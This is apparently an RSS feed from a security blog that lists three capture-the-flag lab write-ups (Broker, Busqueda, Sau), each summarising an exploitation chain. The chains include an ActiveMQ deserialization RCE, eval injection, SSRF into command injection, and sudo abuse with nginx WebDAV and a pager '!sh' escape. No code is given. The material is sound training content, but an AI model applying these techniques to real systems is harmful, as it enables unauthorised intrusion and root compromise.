<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Rce on appl3b0y</title>
    <link>https://appl3b0y.com/tags/rce/</link>
    <description>Recent content in Rce on appl3b0y</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 04 Jun 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://appl3b0y.com/tags/rce/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Broker</title>
      <link>https://appl3b0y.com/writeups/broker/</link>
      <pubDate>Thu, 04 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/broker/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Broker&lt;/strong&gt; is an easy Linux box built around a single, very topical vulnerability: &lt;strong&gt;CVE-2023-46604&lt;/strong&gt;, the Apache ActiveMQ OpenWire remote code execution bug that made a lot of noise in late 2023. It is a clean, two-step machine: get RCE on the message broker, then abuse one over-permissive &lt;code&gt;sudo&lt;/code&gt; rule to become root.&lt;/p&gt;&#xA;&lt;p&gt;The foothold is almost handed to us. The ActiveMQ web console uses default &lt;code&gt;admin:admin&lt;/code&gt; credentials, which is enough to read the exact version (5.15.15) and confirm it is vulnerable. From there, the OpenWire protocol on &lt;strong&gt;61616&lt;/strong&gt; lets us trigger a deserialization gadget that makes the broker fetch and execute a remote Spring XML, which runs our payload and returns a shell as the &lt;code&gt;activemq&lt;/code&gt; user. Privesc is a textbook GTFOBins move: &lt;code&gt;activemq&lt;/code&gt; can run &lt;code&gt;nginx&lt;/code&gt; under &lt;code&gt;sudo&lt;/code&gt;, so we start a root-owned nginx with WebDAV &lt;code&gt;PUT&lt;/code&gt; enabled and simply write our SSH key into &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Busqueda</title>
      <link>https://appl3b0y.com/writeups/busqueda/</link>
      <pubDate>Tue, 02 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/busqueda/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Busqueda&lt;/strong&gt; is an easy Linux box that plays out like a small, realistic engagement: one web bug for the foothold, then a chain of information leaks and a &lt;code&gt;sudo&lt;/code&gt; misconfiguration for root. No memory corruption, just reading things carefully.&lt;/p&gt;&#xA;&lt;p&gt;The foothold is an &lt;strong&gt;&lt;code&gt;eval()&lt;/code&gt; injection&lt;/strong&gt; in &lt;strong&gt;Searchor 2.4.0&lt;/strong&gt;, the library powering the search site. That gives a shell as &lt;code&gt;svc&lt;/code&gt;. From there the box is about looting: a leftover &lt;code&gt;.git/config&lt;/code&gt; exposes a Gitea instance and a set of credentials, and a &lt;code&gt;sudo&lt;/code&gt;-runnable &amp;ldquo;system checkup&amp;rdquo; script lets us inspect Docker containers, one of which leaks a database password. That password is &lt;strong&gt;reused&lt;/strong&gt; for the Gitea admin, which lets us read the source of the very script we can run as root. The script calls a helper by a &lt;strong&gt;relative path&lt;/strong&gt;, so we drop our own version in the working directory and run it as root.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sau</title>
      <link>https://appl3b0y.com/writeups/sau/</link>
      <pubDate>Tue, 02 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/sau/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Sau&lt;/strong&gt; is an easy Linux box, and it is a very clean example of chaining three small, well-scoped bugs into root. Nothing here needs a custom exploit or memory corruption; each stage is &amp;ldquo;known software at a known vulnerable version&amp;rdquo;.&lt;/p&gt;&#xA;&lt;p&gt;The chain: the only web app we can reach is &lt;strong&gt;Request Baskets 1.2.1&lt;/strong&gt;, which has an &lt;strong&gt;SSRF&lt;/strong&gt; (CVE-2023-27163). We use that SSRF to punch through the firewall and reach a port that nmap reported as &lt;code&gt;filtered&lt;/code&gt;. Behind that port sits &lt;strong&gt;Maltrail v0.53&lt;/strong&gt;, which has a trivial &lt;strong&gt;unauthenticated command injection&lt;/strong&gt; in its login page, giving us a shell as &lt;code&gt;puma&lt;/code&gt;. Finally, &lt;code&gt;puma&lt;/code&gt; is allowed to run &lt;code&gt;systemctl status&lt;/code&gt; under &lt;code&gt;sudo&lt;/code&gt;, and because &lt;code&gt;systemctl&lt;/code&gt; pipes long output through the &lt;code&gt;less&lt;/code&gt; pager, we drop into a root shell with a single &lt;code&gt;!sh&lt;/code&gt;.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
